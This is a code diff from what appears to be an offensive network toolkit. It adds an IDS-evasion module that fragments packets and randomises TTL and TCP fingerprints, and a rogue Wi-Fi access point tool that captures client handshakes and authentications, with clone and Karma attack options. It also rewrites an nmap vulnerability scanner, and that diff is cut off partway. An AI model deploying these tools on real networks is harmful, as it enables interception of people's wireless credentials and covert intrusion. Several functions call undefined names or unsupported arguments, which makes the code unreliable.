# Saves settings in `/home/bjorn/.settings_bjorn/heimdall_guard_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -i, --interface Network interface to use (default: active interface).
# -m, --mode Operating mode (timing, random, fragmented, all).
# -d, --delay Base delay between operations in seconds (default: 1).
# -r, --randomize Randomization factor for timing (default: 0.5).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/stealth).
import os
import json
import argparse
from datetime import datetime
import logging
import random
import time
import socket
import struct
import threading
from scapy.all import *
from collections import deque
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
b_class = "HeimdallGuard"
b_module = "heimdall_guard"
b_enabled = 0
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/stealth"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "heimdall_guard_settings.json")
class HeimdallGuard:
def __init__(self, interface, mode='all', base_delay=1, random_factor=0.5, output_dir=DEFAULT_OUTPUT_DIR):
self.interface = interface
self.mode = mode
self.base_delay = base_delay
self.random_factor = random_factor
self.output_dir = output_dir
self.packet_queue = deque()
self.active = False
self.lock = threading.Lock()
# Statistics
self.stats = {
'packets_processed': 0,
'packets_fragmented': 0,
'timing_adjustments': 0
}
def initialize_interface(self):
"""Configure network interface for stealth operations."""
try:
# Disable NIC offloading features that might interfere with packet manipulation
commands = [
f"ethtool -K {self.interface} tso off", # TCP segmentation offload
f"ethtool -K {self.interface} gso off", # Generic segmentation offload
f"ethtool -K {self.interface} gro off", # Generic receive offload
f"ethtool -K {self.interface} lro off" # Large receive offload
]
for cmd in commands:
try:
subprocess.run(cmd.split(), check=True)
except subprocess.CalledProcessError:
logging.warning(f"Failed to execute: {cmd}")
logging.info(f"Interface {self.interface} configured for stealth operations")
return True
except Exception as e:
logging.error(f"Failed to initialize interface: {e}")
return False
def calculate_timing(self):
"""Calculate timing delays with randomization."""
base = self.base_delay
variation = self.random_factor * base
return max(0, base + random.uniform(-variation, variation))
def fragment_packet(self, packet, mtu=1500):
"""Fragment packets to avoid detection patterns."""
try:
if IP in packet:
# Fragment IP packets
frags = []
payload = bytes(packet[IP].payload)
header_length = len(packet) - len(payload)
max_size = mtu - header_length
# Create fragments
offset = 0
while offset < len(payload):
frag_size = min(max_size, len(payload) - offset)
frag_payload = payload[offset:offset + frag_size]
# Create fragment packet
frag = packet.copy()
frag[IP].flags = 'MF' if offset + frag_size < len(payload) else 0
frag[IP].frag = offset // 8
frag[IP].payload = Raw(frag_payload)
frags.append(frag)
offset += frag_size
return frags
return [packet]
except Exception as e:
logging.error(f"Error fragmenting packet: {e}")
return [packet]
def randomize_ttl(self, packet):
"""Randomize TTL values to avoid fingerprinting."""
if IP in packet:
ttl_values = [32, 64, 128, 255] # Common TTL values
packet[IP].ttl = random.choice(ttl_values)
return packet
def modify_tcp_options(self, packet):
"""Modify TCP options to avoid fingerprinting."""
if TCP in packet:
# Common window sizes
window_sizes = [8192, 16384, 32768, 65535]
packet[TCP].window = random.choice(window_sizes)
# Randomize TCP options
tcp_options = []
# MSS option
mss_values = [1400, 1460, 1440]
tcp_options.append(('MSS', random.choice(mss_values)))
# Window scale
if random.random() < 0.5:
tcp_options.append(('WScale', random.randint(0, 14)))
# SACK permitted
if random.random() < 0.5:
tcp_options.append(('SAckOK', ''))
packet[TCP].options = tcp_options
return packet
def process_packet(self, packet):
"""Process a packet according to stealth settings."""
processed_packets = []
try:
if self.mode in ['all', 'fragmented']:
fragments = self.fragment_packet(packet)
processed_packets.extend(fragments)
self.stats['packets_fragmented'] += len(fragments) - 1
else:
processed_packets.append(packet)
# Apply additional stealth techniques
final_packets = []
for pkt in processed_packets:
pkt = self.randomize_ttl(pkt)
pkt = self.modify_tcp_options(pkt)
final_packets.append(pkt)
self.stats['packets_processed'] += len(final_packets)
return final_packets
except Exception as e:
logging.error(f"Error processing packet: {e}")
return [packet]
def send_packet(self, packet):
"""Send packet with timing adjustments."""
try:
if self.mode in ['all', 'timing']:
delay = self.calculate_timing()
time.sleep(delay)
self.stats['timing_adjustments'] += 1
send(packet, iface=self.interface, verbose=False)
except Exception as e:
logging.error(f"Error sending packet: {e}")
def packet_processor_thread(self):
"""Process packets from the queue."""
while self.active:
try:
if self.packet_queue:
packet = self.packet_queue.popleft()
processed_packets = self.process_packet(packet)
for processed in processed_packets:
self.send_packet(processed)
else:
time.sleep(0.1)
except Exception as e:
logging.error(f"Error in packet processor thread: {e}")
def start(self):
"""Start stealth operations."""
if not self.initialize_interface():
return False
self.active = True
self.processor_thread = threading.Thread(target=self.packet_processor_thread)
self.processor_thread.start()
return True
def stop(self):
"""Stop stealth operations."""
self.active = False
if hasattr(self, 'processor_thread'):
self.processor_thread.join()
self.save_stats()
def queue_packet(self, packet):
"""Queue a packet for processing."""
self.packet_queue.append(packet)
def save_stats(self):
"""Save operation statistics."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
stats_file = os.path.join(self.output_dir, f"stealth_stats_{timestamp}.json")
with open(stats_file, 'w') as f:
json.dump({
'timestamp': datetime.now().isoformat(),
'interface': self.interface,
'mode': self.mode,
'stats': self.stats
}, f, indent=4)
logging.info(f"Statistics saved to {stats_file}")
except Exception as e:
logging.error(f"Failed to save statistics: {e}")
def save_settings(interface, mode, base_delay, random_factor, output_dir):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"interface": interface,
"mode": mode,
"base_delay": base_delay,
"random_factor": random_factor,
"output_dir": output_dir
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="Stealth operations module")
parser.add_argument("-i", "--interface", help="Network interface to use")
parser.add_argument("-m", "--mode", choices=['timing', 'random', 'fragmented', 'all'],
default='all', help="Operating mode")
parser.add_argument("-d", "--delay", type=float, default=1, help="Base delay between operations")
parser.add_argument("-r", "--randomize", type=float, default=0.5, help="Randomization factor")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
args = parser.parse_args()
settings = load_settings()
interface = args.interface or settings.get("interface")
mode = args.mode or settings.get("mode")
base_delay = args.delay or settings.get("base_delay")
random_factor = args.randomize or settings.get("random_factor")
output_dir = args.output or settings.get("output_dir")
if not interface:
interface = conf.iface
logging.info(f"Using default interface: {interface}")
save_settings(interface, mode, base_delay, random_factor, output_dir)
guard = HeimdallGuard(
interface=interface,
mode=mode,
base_delay=base_delay,
random_factor=random_factor,
output_dir=output_dir
)
try:
if guard.start():
logging.info("Heimdall Guard started. Press Ctrl+C to stop.")
while True:
time.sleep(1)
except KeyboardInterrupt:
logging.info("Stopping Heimdall Guard...")
guard.stop()
if __name__ == "__main__":
main()

View File

@@ -1,34 +0,0 @@
#Test script to add more actions to BJORN
import logging
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="log_standalone.py", level=logging.INFO)
# Define the necessary global variables
b_class = "LogStandalone"
b_module = "log_standalone"
b_status = "log_standalone"
b_port = 0 # Indicate this is a standalone action
class LogStandalone:
"""
Class to handle the standalone log action.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
logger.info("LogStandalone initialized")
def execute(self):
"""
Execute the standalone log action.
"""
try:
logger.info("Executing standalone log action.")
logger.info("This is a test log message for the standalone action.")
return 'success'
except Exception as e:
logger.error(f"Error executing standalone log action: {e}")
return 'failed'

View File

@@ -1,34 +0,0 @@
#Test script to add more actions to BJORN
import logging
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="log_standalone2.py", level=logging.INFO)
# Define the necessary global variables
b_class = "LogStandalone2"
b_module = "log_standalone2"
b_status = "log_standalone2"
b_port = 0 # Indicate this is a standalone action
class LogStandalone2:
"""
Class to handle the standalone log action.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
logger.info("LogStandalone initialized")
def execute(self):
"""
Execute the standalone log action.
"""
try:
logger.info("Executing standalone log action.")
logger.info("This is a test log message for the standalone action.")
return 'success'
except Exception as e:
logger.error(f"Error executing standalone log action: {e}")
return 'failed'

467
actions/loki_deceiver.py Normal file
View File

@@ -0,0 +1,467 @@
# WiFi deception tool for creating malicious access points and capturing authentications.
# Saves settings in `/home/bjorn/.settings_bjorn/loki_deceiver_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -i, --interface Wireless interface for AP creation (default: wlan0).
# -s, --ssid SSID for the fake access point (or target to clone).
# -c, --channel WiFi channel (default: 6).
# -p, --password Optional password for WPA2 AP.
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/wifi).
import os
import json
import argparse
from datetime import datetime
import logging
import subprocess
import signal
import time
import threading
import scapy.all as scapy
from scapy.layers.dot11 import Dot11, Dot11Beacon, Dot11Elt
b_class = "LokiDeceiver"
b_module = "loki_deceiver"
b_enabled = 0
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/wifi"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "loki_deceiver_settings.json")
class LokiDeceiver:
def __init__(self, interface, ssid, channel=6, password=None, output_dir=DEFAULT_OUTPUT_DIR):
self.interface = interface
self.ssid = ssid
self.channel = channel
self.password = password
self.output_dir = output_dir
self.original_mac = None
self.captured_handshakes = []
self.captured_credentials = []
self.active = False
self.lock = threading.Lock()
def setup_interface(self):
"""Configure wireless interface for AP mode."""
try:
# Kill potentially interfering processes
subprocess.run(['sudo', 'airmon-ng', 'check', 'kill'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Stop NetworkManager
subprocess.run(['sudo', 'systemctl', 'stop', 'NetworkManager'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Save original MAC
self.original_mac = self.get_interface_mac()
# Enable monitor mode
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'down'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
subprocess.run(['sudo', 'iw', self.interface, 'set', 'monitor', 'none'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'up'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
logging.info(f"Interface {self.interface} configured in monitor mode")
return True
except Exception as e:
logging.error(f"Failed to setup interface: {e}")
return False
def get_interface_mac(self):
"""Get the MAC address of the wireless interface."""
try:
result = subprocess.run(['ip', 'link', 'show', self.interface],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if result.returncode == 0:
mac = re.search(r'link/ether ([0-9a-f:]{17})', result.stdout)
if mac:
return mac.group(1)
except Exception as e:
logging.error(f"Failed to get interface MAC: {e}")
return None
def create_ap_config(self):
"""Create configuration for hostapd."""
try:
config = [
'interface=' + self.interface,
'driver=nl80211',
'ssid=' + self.ssid,
'hw_mode=g',
'channel=' + str(self.channel),
'macaddr_acl=0',
'ignore_broadcast_ssid=0'
]
if self.password:
config.extend([
'auth_algs=1',
'wpa=2',
'wpa_passphrase=' + self.password,
'wpa_key_mgmt=WPA-PSK',
'wpa_pairwise=CCMP',
'rsn_pairwise=CCMP'
])
config_path = '/tmp/hostapd.conf'
with open(config_path, 'w') as f:
f.write('\n'.join(config))
return config_path
except Exception as e:
logging.error(f"Failed to create AP config: {e}")
return None
def setup_dhcp(self):
"""Configure DHCP server using dnsmasq."""
try:
config = [
'interface=' + self.interface,
'dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h',
'dhcp-option=3,192.168.1.1',
'dhcp-option=6,192.168.1.1',
'server=8.8.8.8',
'log-queries',
'log-dhcp'
]
config_path = '/tmp/dnsmasq.conf'
with open(config_path, 'w') as f:
f.write('\n'.join(config))
# Configure interface IP
subprocess.run(['sudo', 'ifconfig', self.interface, '192.168.1.1', 'netmask', '255.255.255.0'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
return config_path
except Exception as e:
logging.error(f"Failed to setup DHCP: {e}")
return None
def start_ap(self):
"""Start the fake access point."""
try:
if not self.setup_interface():
return False
hostapd_config = self.create_ap_config()
dhcp_config = self.setup_dhcp()
if not hostapd_config or not dhcp_config:
return False
# Start hostapd
self.hostapd_process = subprocess.Popen(
['sudo', 'hostapd', hostapd_config],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
# Start dnsmasq
self.dnsmasq_process = subprocess.Popen(
['sudo', 'dnsmasq', '-C', dhcp_config],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
self.active = True
logging.info(f"Access point {self.ssid} started on channel {self.channel}")
# Start packet capture
self.start_capture()
return True
except Exception as e:
logging.error(f"Failed to start AP: {e}")
return False
def start_capture(self):
"""Start capturing wireless traffic."""
try:
# Start tcpdump for capturing handshakes
handshake_path = os.path.join(self.output_dir, 'handshakes')
os.makedirs(handshake_path, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
pcap_file = os.path.join(handshake_path, f"capture_{timestamp}.pcap")
self.tcpdump_process = subprocess.Popen(
['sudo', 'tcpdump', '-i', self.interface, '-w', pcap_file],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
# Start sniffing in a separate thread
self.sniffer_thread = threading.Thread(target=self.packet_sniffer)
self.sniffer_thread.start()
except Exception as e:
logging.error(f"Failed to start capture: {e}")
def packet_sniffer(self):
"""Sniff and process packets."""
try:
scapy.sniff(iface=self.interface, prn=self.process_packet, store=0,
stop_filter=lambda p: not self.active)
except Exception as e:
logging.error(f"Sniffer error: {e}")
def process_packet(self, packet):
"""Process captured packets."""
try:
if packet.haslayer(Dot11):
# Process authentication attempts
if packet.type == 0 and packet.subtype == 11: # Authentication
self.process_auth(packet)
# Process association requests
elif packet.type == 0 and packet.subtype == 0: # Association request
self.process_assoc(packet)
# Process EAPOL packets for handshakes
elif packet.haslayer(EAPOL):
self.process_handshake(packet)
except Exception as e:
logging.error(f"Error processing packet: {e}")
def process_auth(self, packet):
"""Process authentication packets."""
try:
if packet.addr2: # Source MAC
with self.lock:
self.captured_credentials.append({
'type': 'auth',
'mac': packet.addr2,
'timestamp': datetime.now().isoformat()
})
except Exception as e:
logging.error(f"Error processing auth packet: {e}")
def process_assoc(self, packet):
"""Process association packets."""
try:
if packet.addr2: # Source MAC
with self.lock:
self.captured_credentials.append({
'type': 'assoc',
'mac': packet.addr2,
'timestamp': datetime.now().isoformat()
})
except Exception as e:
logging.error(f"Error processing assoc packet: {e}")
def process_handshake(self, packet):
"""Process EAPOL packets for handshakes."""
try:
if packet.addr2: # Source MAC
with self.lock:
self.captured_handshakes.append({
'mac': packet.addr2,
'timestamp': datetime.now().isoformat()
})
except Exception as e:
logging.error(f"Error processing handshake packet: {e}")
def save_results(self):
"""Save captured data to JSON files."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
results = {
'ap_info': {
'ssid': self.ssid,
'channel': self.channel,
'interface': self.interface
},
'credentials': self.captured_credentials,
'handshakes': self.captured_handshakes
}
output_file = os.path.join(self.output_dir, f"results_{timestamp}.json")
with open(output_file, 'w') as f:
json.dump(results, f, indent=4)
logging.info(f"Results saved to {output_file}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def cleanup(self):
"""Clean up resources and restore interface."""
try:
self.active = False
# Stop processes
for process in [self.hostapd_process, self.dnsmasq_process, self.tcpdump_process]:
if process:
process.terminate()
process.wait()
# Restore interface
if self.original_mac:
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'down'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
subprocess.run(['sudo', 'iw', self.interface, 'set', 'type', 'managed'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
subprocess.run(['sudo', 'ip', 'link', 'set', self.interface, 'up'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Restart NetworkManager
subprocess.run(['sudo', 'systemctl', 'start', 'NetworkManager'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
logging.info("Cleanup completed")
except Exception as e:
logging.error(f"Error during cleanup: {e}")
def save_settings(interface, ssid, channel, password, output_dir):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"interface": interface,
"ssid": ssid,
"channel": channel,
"password": password,
"output_dir": output_dir
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="WiFi deception tool")
parser.add_argument("-i", "--interface", default="wlan0", help="Wireless interface")
parser.add_argument("-s", "--ssid", help="SSID for fake AP")
parser.add_argument("-c", "--channel", type=int, default=6, help="WiFi channel")
parser.add_argument("-p", "--password", help="WPA2 password")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
# Honeypot options
parser.add_argument("--captive-portal", action="store_true", help="Enable captive portal")
parser.add_argument("--clone-ap", help="SSID to clone and impersonate")
parser.add_argument("--karma", action="store_true", help="Enable Karma attack mode")
# Advanced options
parser.add_argument("--beacon-interval", type=int, default=100, help="Beacon interval in ms")
parser.add_argument("--max-clients", type=int, default=10, help="Maximum number of clients")
parser.add_argument("--timeout", type=int, help="Runtime duration in seconds")
args = parser.parse_args()
settings = load_settings()
interface = args.interface or settings.get("interface")
ssid = args.ssid or settings.get("ssid")
channel = args.channel or settings.get("channel")
password = args.password or settings.get("password")
output_dir = args.output or settings.get("output_dir")
# Load advanced settings
captive_portal = args.captive_portal or settings.get("captive_portal", False)
clone_ap = args.clone_ap or settings.get("clone_ap")
karma = args.karma or settings.get("karma", False)
beacon_interval = args.beacon_interval or settings.get("beacon_interval", 100)
max_clients = args.max_clients or settings.get("max_clients", 10)
timeout = args.timeout or settings.get("timeout")
if not interface:
logging.error("Interface is required. Use -i or save it in settings")
return
# Clone AP if requested
if clone_ap:
logging.info(f"Attempting to clone AP: {clone_ap}")
clone_info = scan_for_ap(interface, clone_ap)
if clone_info:
ssid = clone_info['ssid']
channel = clone_info['channel']
logging.info(f"Successfully cloned AP settings: {ssid} on channel {channel}")
else:
logging.error(f"Failed to find AP to clone: {clone_ap}")
return
# Save all settings
save_settings(
interface=interface,
ssid=ssid,
channel=channel,
password=password,
output_dir=output_dir,
captive_portal=captive_portal,
clone_ap=clone_ap,
karma=karma,
beacon_interval=beacon_interval,
max_clients=max_clients,
timeout=timeout
)
# Create and configure deceiver
deceiver = LokiDeceiver(
interface=interface,
ssid=ssid,
channel=channel,
password=password,
output_dir=output_dir,
captive_portal=captive_portal,
karma=karma,
beacon_interval=beacon_interval,
max_clients=max_clients
)
try:
# Start the deception
if deceiver.start():
logging.info(f"Access point {ssid} started on channel {channel}")
if timeout:
logging.info(f"Running for {timeout} seconds")
time.sleep(timeout)
deceiver.stop()
else:
logging.info("Press Ctrl+C to stop")
while True:
time.sleep(1)
except KeyboardInterrupt:
logging.info("Stopping Loki Deceiver...")
except Exception as e:
logging.error(f"Unexpected error: {e}")
finally:
deceiver.stop()
logging.info("Cleanup completed")
if __name__ == "__main__":
# Set process niceness to high priority
try:
os.nice(-10)
except:
logging.warning("Failed to set process priority. Running with default priority.")
# Start main function
main()

View File

@@ -1,188 +1,408 @@
# nmap_vuln_scanner.py
# This script performs vulnerability scanning using Nmap on specified IP addresses.
# It scans for vulnerabilities on various ports and saves the results and progress.
"""
Vulnerability Scanner Action
Scanne ultra-rapidement CPE (+ CVE via vulners si dispo),
avec fallback "lourd" optionnel.
"""
import os
import pandas as pd
import subprocess
import nmap
import json
import logging
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor, as_completed
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn
from typing import Dict, List, Set, Any, Optional
from datetime import datetime, timedelta
from shared import SharedData
from logger import Logger
logger = Logger(name="nmap_vuln_scanner.py", level=logging.INFO)
logger = Logger(name="NmapVulnScanner.py", level=logging.DEBUG)
b_class = "NmapVulnScanner"
b_module = "nmap_vuln_scanner"
b_status = "vuln_scan"
b_status = "NmapVulnScanner"
b_port = None
b_parent = None
b_action = "normal"
b_service = []
b_trigger = "on_port_change"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 11
b_cooldown = 0
b_enabled = 1
b_rate_limit = None
class NmapVulnScanner:
"""
This class handles the Nmap vulnerability scanning process.
"""
def __init__(self, shared_data):
"""Scanner de vulnérabilités via nmap (mode rapide CPE/CVE)."""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.scan_results = []
self.summary_file = self.shared_data.vuln_summary_file
self.create_summary_file()
logger.debug("NmapVulnScanner initialized.")
self.nm = nmap.PortScanner()
logger.info("NmapVulnScanner initialized")
def create_summary_file(self):
"""
Creates a summary file for vulnerabilities if it does not exist.
"""
if not os.path.exists(self.summary_file):
os.makedirs(self.shared_data.vulnerabilities_dir, exist_ok=True)
df = pd.DataFrame(columns=["IP", "Hostname", "MAC Address", "Port", "Vulnerabilities"])
df.to_csv(self.summary_file, index=False)
# ---------------------------- Public API ---------------------------- #
def update_summary_file(self, ip, hostname, mac, port, vulnerabilities):
"""
Updates the summary file with the scan results.
"""
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try:
# Read existing data
df = pd.read_csv(self.summary_file)
logger.info(f"🔍 Starting vulnerability scan for {ip}")
self.shared_data.bjorn_orch_status = "NmapVulnScanner"
# Create new data entry
new_data = pd.DataFrame([{"IP": ip, "Hostname": hostname, "MAC Address": mac, "Port": port, "Vulnerabilities": vulnerabilities}])
# Append new data
df = pd.concat([df, new_data], ignore_index=True)
# Remove duplicates based on IP and MAC Address, keeping the last occurrence
df.drop_duplicates(subset=["IP", "MAC Address"], keep='last', inplace=True)
# Save the updated data back to the summary file
df.to_csv(self.summary_file, index=False)
except Exception as e:
logger.error(f"Error updating summary file: {e}")
def scan_vulnerabilities(self, ip, hostname, mac, ports):
combined_result = ""
success = True # Initialize to True, will become False if an error occurs
# 1) metadata depuis la queue
meta = {}
try:
self.shared_data.bjornstatustext2 = ip
meta = json.loads(row.get('metadata') or '{}')
except Exception:
pass
# Proceed with scanning if ports are not already scanned
logger.info(f"Scanning {ip} on ports {','.join(ports)} for vulnerabilities with aggressivity {self.shared_data.nmap_scan_aggressivity}")
result = subprocess.run(
["nmap", self.shared_data.nmap_scan_aggressivity, "-sV", "--script", "vulners.nse", "-p", ",".join(ports), ip],
capture_output=True, text=True
# 2) récupérer MAC et TOUS les ports de l'hôte
mac = row.get("MAC Address") or row.get("mac_address") or ""
# ✅ FORCER la récupération de TOUS les ports depuis la DB
ports_str = ""
if mac:
r = self.shared_data.db.query(
"SELECT ports FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
combined_result += result.stdout
if r and r[0].get('ports'):
ports_str = r[0]['ports']
vulnerabilities = self.parse_vulnerabilities(result.stdout)
self.update_summary_file(ip, hostname, mac, ",".join(ports), vulnerabilities)
except Exception as e:
logger.error(f"Error scanning {ip}: {e}")
success = False # Mark as failed if an error occurs
# Fallback sur les métadonnées si besoin
if not ports_str:
ports_str = (
row.get("Ports") or row.get("ports") or
meta.get("ports_snapshot") or ""
)
return combined_result if success else None
if not ports_str:
logger.warning(f"⚠️ No ports to scan for {ip}")
return 'failed'
def execute(self, ip, row, status_key):
"""
Executes the vulnerability scan for a given IP and row data.
"""
self.shared_data.bjornorch_status = "NmapVulnScanner"
ports = row["Ports"].split(";")
scan_result = self.scan_vulnerabilities(ip, row["Hostnames"], row["MAC Address"], ports)
ports = [p.strip() for p in ports_str.split(';') if p.strip()]
logger.debug(f"📋 Found {len(ports)} ports for {ip}: {ports[:5]}...")
if scan_result is not None:
self.scan_results.append((ip, row["Hostnames"], row["MAC Address"]))
self.save_results(row["MAC Address"], ip, scan_result)
# ✅ FIX : Ne filtrer QUE si config activée ET déjà scanné
if self.shared_data.config.get('vuln_rescan_on_change_only', False):
if self._has_been_scanned(mac):
original_count = len(ports)
ports = self._filter_ports_already_scanned(mac, ports)
logger.debug(f"🔄 Filtered {original_count - len(ports)} already-scanned ports")
if not ports:
logger.info(f"✅ No new/changed ports to scan for {ip}")
return 'success'
# Scanner (mode rapide par défaut)
logger.info(f"🚀 Starting nmap scan on {len(ports)} ports for {ip}")
findings = self.scan_vulnerabilities(ip, ports)
# Persistance (split CVE/CPE)
self.save_vulnerabilities(mac, ip, findings)
logger.success(f"✅ Vuln scan done on {ip}: {len(findings)} entries")
return 'success'
except Exception as e:
logger.error(f"❌ NmapVulnScanner failed for {ip}: {e}")
return 'failed'
def _has_been_scanned(self, mac: str) -> bool:
"""Vérifie si l'hôte a déjà été scanné au moins une fois."""
rows = self.shared_data.db.query("""
SELECT 1 FROM action_queue
WHERE mac_address=? AND action_name='NmapVulnScanner'
AND status IN ('success', 'failed')
LIMIT 1
""", (mac,))
return bool(rows)
def _filter_ports_already_scanned(self, mac: str, ports: List[str]) -> List[str]:
"""
Retourne la liste des ports à scanner en excluant ceux déjà scannés récemment.
"""
if not ports:
return []
# Ports déjà couverts par detected_software (is_active=1)
rows = self.shared_data.db.query("""
SELECT port, last_seen
FROM detected_software
WHERE mac_address=? AND is_active=1 AND port IS NOT NULL
""", (mac,))
seen = {}
for r in rows:
try:
p = str(r['port'])
ls = r.get('last_seen')
seen[p] = ls
except Exception:
pass
ttl = int(self.shared_data.config.get('vuln_rescan_ttl_seconds', 0) or 0)
if ttl > 0:
cutoff = datetime.utcnow() - timedelta(seconds=ttl)
def fresh(port: str) -> bool:
ls = seen.get(port)
if not ls:
return False
try:
dt = datetime.fromisoformat(ls.replace('Z',''))
return dt >= cutoff
except Exception:
return True
return [p for p in ports if (p not in seen) or (not fresh(p))]
else:
return 'success' # considering failed as success as we just need to scan vulnerabilities once
# return 'failed'
# Sans TTL: si déjà scanné/présent actif => on skip
return [p for p in ports if p not in seen]
def parse_vulnerabilities(self, scan_result):
"""
Parses the Nmap scan result to extract vulnerabilities.
"""
vulnerabilities = set()
capture = False
for line in scan_result.splitlines():
if "VULNERABLE" in line or "CVE-" in line or "*EXPLOIT*" in line:
capture = True
if capture:
if line.strip() and not line.startswith('|_'):
vulnerabilities.add(line.strip())
# ---------------------------- Scanning ------------------------------ #
def scan_vulnerabilities(self, ip: str, ports: List[str]) -> List[Dict]:
"""Mode rapide CPE/CVE ou fallback lourd."""
fast = bool(self.shared_data.config.get('vuln_fast', True))
use_vulners = bool(self.shared_data.config.get('nse_vulners', False))
max_ports = int(self.shared_data.config.get('vuln_max_ports', 10 if fast else 20))
p_list = [str(p).split('/')[0] for p in ports if str(p).strip()]
port_list = ','.join(p_list[:max_ports]) if p_list else ''
if not port_list:
logger.warning("No valid ports for scan")
return []
if fast:
return self._scan_fast_cpe_cve(ip, port_list, use_vulners)
else:
capture = False
return "; ".join(vulnerabilities)
return self._scan_heavy(ip, port_list)
def save_results(self, mac_address, ip, scan_result):
"""
Saves the detailed scan results to a file.
"""
def _scan_fast_cpe_cve(self, ip: str, port_list: str, use_vulners: bool) -> List[Dict]:
"""Scan rapide pour récupérer CPE et (option) CVE via vulners."""
vulns: List[Dict] = []
args = "-sV --version-light -T4 --max-retries 1 --host-timeout 30s --script-timeout 10s"
if use_vulners:
args += " --script vulners --script-args mincvss=0.0"
logger.info(f"[FAST] nmap {ip} -p {port_list} ({args})")
try:
sanitized_mac_address = mac_address.replace(":", "")
result_dir = self.shared_data.vulnerabilities_dir
os.makedirs(result_dir, exist_ok=True)
result_file = os.path.join(result_dir, f"{sanitized_mac_address}_{ip}_vuln_scan.txt")
# Open the file in write mode to clear its contents if it exists, then close it
if os.path.exists(result_file):
open(result_file, 'w').close()
# Write the new scan result to the file
with open(result_file, 'w') as file:
file.write(scan_result)
logger.info(f"Results saved to {result_file}")
self.nm.scan(hosts=ip, ports=port_list, arguments=args)
except Exception as e:
logger.error(f"Error saving scan results for {ip}: {e}")
logger.error(f"Fast scan failed to start: {e}")
return vulns
if ip not in self.nm.all_hosts():
return vulns
def save_summary(self):
"""
Saves a summary of all scanned vulnerabilities to a final summary file.
"""
host = self.nm[ip]
for proto in host.all_protocols():
for port in host[proto].keys():
port_info = host[proto][port]
service = port_info.get('name', '') or ''
# 1) CPE depuis -sV
cpe_values = self._extract_cpe_values(port_info)
for cpe in cpe_values:
vulns.append({
'port': port,
'service': service,
'vuln_id': f"CPE:{cpe}",
'script': 'service-detect',
'details': f"CPE detected: {cpe}"[:500]
})
# 2) CVE via script 'vulners' (si actif)
try:
final_summary_file = os.path.join(self.shared_data.vulnerabilities_dir, "final_vulnerability_summary.csv")
df = pd.read_csv(self.summary_file)
summary_data = df.groupby(["IP", "Hostname", "MAC Address"])["Vulnerabilities"].apply(lambda x: "; ".join(set("; ".join(x).split("; ")))).reset_index()
summary_data.to_csv(final_summary_file, index=False)
logger.info(f"Summary saved to {final_summary_file}")
except Exception as e:
logger.error(f"Error saving summary: {e}")
